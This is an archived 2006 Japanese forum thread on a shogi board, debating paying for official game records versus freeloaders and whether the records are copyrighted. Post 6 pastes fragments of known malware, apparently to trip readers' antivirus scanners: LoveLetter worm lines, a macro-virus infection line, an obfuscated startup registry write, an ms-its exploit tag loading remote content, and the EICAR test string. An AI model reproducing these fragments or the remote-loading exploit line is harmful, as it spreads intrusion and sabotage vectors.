2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【パラレル】500円厨vsクレクレ厨【ワールド】

1 :名無し名人:2006/10/21(土) 03:57:42 ID:uH0VMoJ2
・なんで500円程度が払えないんだ!?⇔減るもんじゃないしくれよw
・法令遵守!⇔ここは2ちゃんだろw
・将棋界発展のために金を落せ!⇔棋譜をくれたら俺がスレ(将棋界)を盛り上げてやるよw

などなど、お互いの立場を理解してもらうような、押し付けるような、そんなスレです!w

2 :フサギコ ◆e51syuFUSA :2006/10/21(土) 03:58:44 ID:v+Nq667o
2

3 :名無し名人:2006/10/21(土) 03:59:29 ID:qNNZR8pg
気楽にもだ。

4 :名無し名人:2006/10/21(土) 04:15:11 ID:uH0VMoJ2
関連スレ

第65期順位戦 - 15
http://game9.2ch.net/test/read.cgi/bgame/1161263087/
【順位戦】ネット中継を評価するスレ【竜王戦】
http://game9.2ch.net/test/read.cgi/bgame/1153600367/
【順位戦】棋譜貼り専用スレッド その4【名人戦】
http://game9.2ch.net/test/read.cgi/bgame/1158339650/

5 :名無し名人:2006/10/21(土) 04:26:21 ID:eYMeDCvW
実際のパラレルワールドとはまったく意味が違う件について

6 :名無し名人:2006/10/21(土) 04:39:02 ID:F3qsxm/5
>>1
パラレル‐ワールド【parallel world】 大辞泉
多次元宇宙。我々の世界と併存すると考えられる異次元の世界。

いやぁ、糞スレですね
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

7 :名無し名人:2006/10/21(土) 04:59:51 ID:uH0VMoJ2
議題其の一
・なんで500円程度が払えないんだ!?⇔減るもんじゃないしくれよw

俺の解釈
「一ヶ月(720時間)の内、一時間(1%以下)の労働ができない人間氏ね」
「別に500円とか(親に頼めば)簡単に払えるけど、クレジットカードとか手続きとか面倒だし、とにかく棋譜くれよ。
ていうか500円厨の方が500円ごときに執着して見苦しいよな」

どっちが正義なんだろうか?

8 :名無し名人:2006/10/21(土) 05:01:35 ID:eYMeDCvW
解決方法
半分だけ貼ってみる
といっても、序盤だけ・終盤だけならなんのこっちゃわからないので
先手のみもしくは後手のみ貼るとか

9 :名無し名人:2006/10/21(土) 05:29:16 ID:uH0VMoJ2
>>8
半分(中間点)を探ることは有意義ですよね

「先手だけ貼ってやる!なぞなぞだと思え!」
「定跡系だからこういう手順だろwていうか全部貼れよw」

これは一つの幸せの形でしょうか

10 :名無し名人:2006/10/21(土) 05:50:34 ID:uH0VMoJ2
>>5
スレタイのパラレルワールドは平行世界、交わらない立場の違いという意味を込めてつけました!
誤用ということですが、フィーリングで感じ取ってくださいw

11 :名無し名人:2006/10/21(土) 09:39:49 ID:XJpZCY3F
>>1
アホ。氏ね。糞スレ立てんな。
どうせ貼る奴がいるんだから話し合いなど無駄だろうが。

早く削除依頼出してこいよカス。
こんなアホ久しぶりだ。クレクレ厨よりアホだ。

12 :名無し名人:2006/10/21(土) 17:34:47 ID:uH0VMoJ2
>>11
無駄なのかもしれませんが、双方の言い分を主張、
また自分が何故500円厨やクレクレ厨をしているのかを理解するスレになればと考えています

感情的になっていては話が前に進みませんので、
「何故貼られることを嫌うのか?」
「何故ネット環境がある人間に月500円程度が払えないのか?携帯には月に数千円は払っているだろう?」
などなど、論理を積み重ねていきたいです

13 :名無し名人:2006/10/21(土) 18:03:06 ID:qhIKfLiT
まだカードつくれる年齢じゃないんだよ俺

14 :名無し名人:2006/10/21(土) 19:10:17 ID:POQ+3koT
しょせん1のカマッテスレ

15 :名無し名人:2006/10/21(土) 19:14:41 ID:BrkBCh3/
>>1
>・法令遵守!⇔ここは2ちゃんだろw
アホか。法律で500円払えなんて決まっていない。
あくまで個人的契約の範疇のこと。簡単に言えば、私的なお約束事を守るかどうかということ。
それと棋譜なんてゲームの進行記録であり、著作権で保護される著作物ではない。
また公知の事実である棋譜について、それを語るなというのは、言論の自由を保障した憲法違反に該当する。
言ってみれば、日本シリーズで今、中日が2点リードしていると言うなというようなものであるのだ。
こんな馬鹿げた話はないのは明らか。
従って、お約束事自体が、違法性を問われるような内容なのである。


16 :名無し名人:2006/10/21(土) 19:53:25 ID:uH0VMoJ2
>>13
中高校生なら親に相談してもいいと思いますが、
家族といえどもクレジットカード使わせてもらうのは抵抗ありますか

>>14
【パラレル】500円厨vsクレクレ厨【ワールド】の66%はやさしさで出来ています
【パラレル】500円厨vsクレクレ厨【ワールド】の28%は言葉で出来ています
【パラレル】500円厨vsクレクレ厨【ワールド】の3%は成功の鍵で出来ています
【パラレル】500円厨vsクレクレ厨【ワールド】の2%は理論で出来ています
【パラレル】500円厨vsクレクレ厨【ワールド】の1%は心の壁で出来ています

>>15
言われてみれば確かに法的な問題はない気がしてきました
知識不足なので後でグーグル先生に聞いてみることにします

17 :名無し名人:2006/10/21(土) 19:53:49 ID:ARLOdofw
佐賀県庁が監視との報道で、2ちゃんねるでは「佐賀」が大流行

18 :名無し名人:2006/10/21(土) 20:23:23 ID:uH0VMoJ2
>>15
「棋譜 著作権」でググってみましたが意見が分かれているみたいですね
連盟が著作権の有無を明らかにしていない(できない?)等の理由で、
貼っても罪に問われることは無いだろうということはわかりました

19 :名無し名人:2006/10/21(土) 20:36:02 ID:BrkBCh3/
>>18
http://bug.org/ML/shogi/onegai.txt
ここ読んでみそ。
要旨は、連盟は「棋譜に著作権を主張する法的根拠が現在のところ『ない』と考えている。
だけど、それでは連盟が損するから、おまえら自主的に棋譜貼りヤメレ。
おまいらの権利より、おれらの金の方が優先だ。
だからおまいらは、オレらの贅沢な生活を維持するために、自ら権利を放棄すれ。
という内容だわ。


20 :名無し名人:2006/10/21(土) 20:38:57 ID:0rOIVL5B
そのMLまだあったのかよ。
10年ぐらい前からあったはず。

21 :名無し名人:2006/10/23(月) 21:25:15 ID:nvUNHUOv
>>1 は立て逃げしたのか


22 :名無し名人:2006/11/16(木) 19:58:05 ID:FJ2V6Pvm
結論は>>1 は馬鹿


23 : ◆mMwwwWwWMM :2006/11/28(火) 10:29:53 ID:nXokulr3


8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)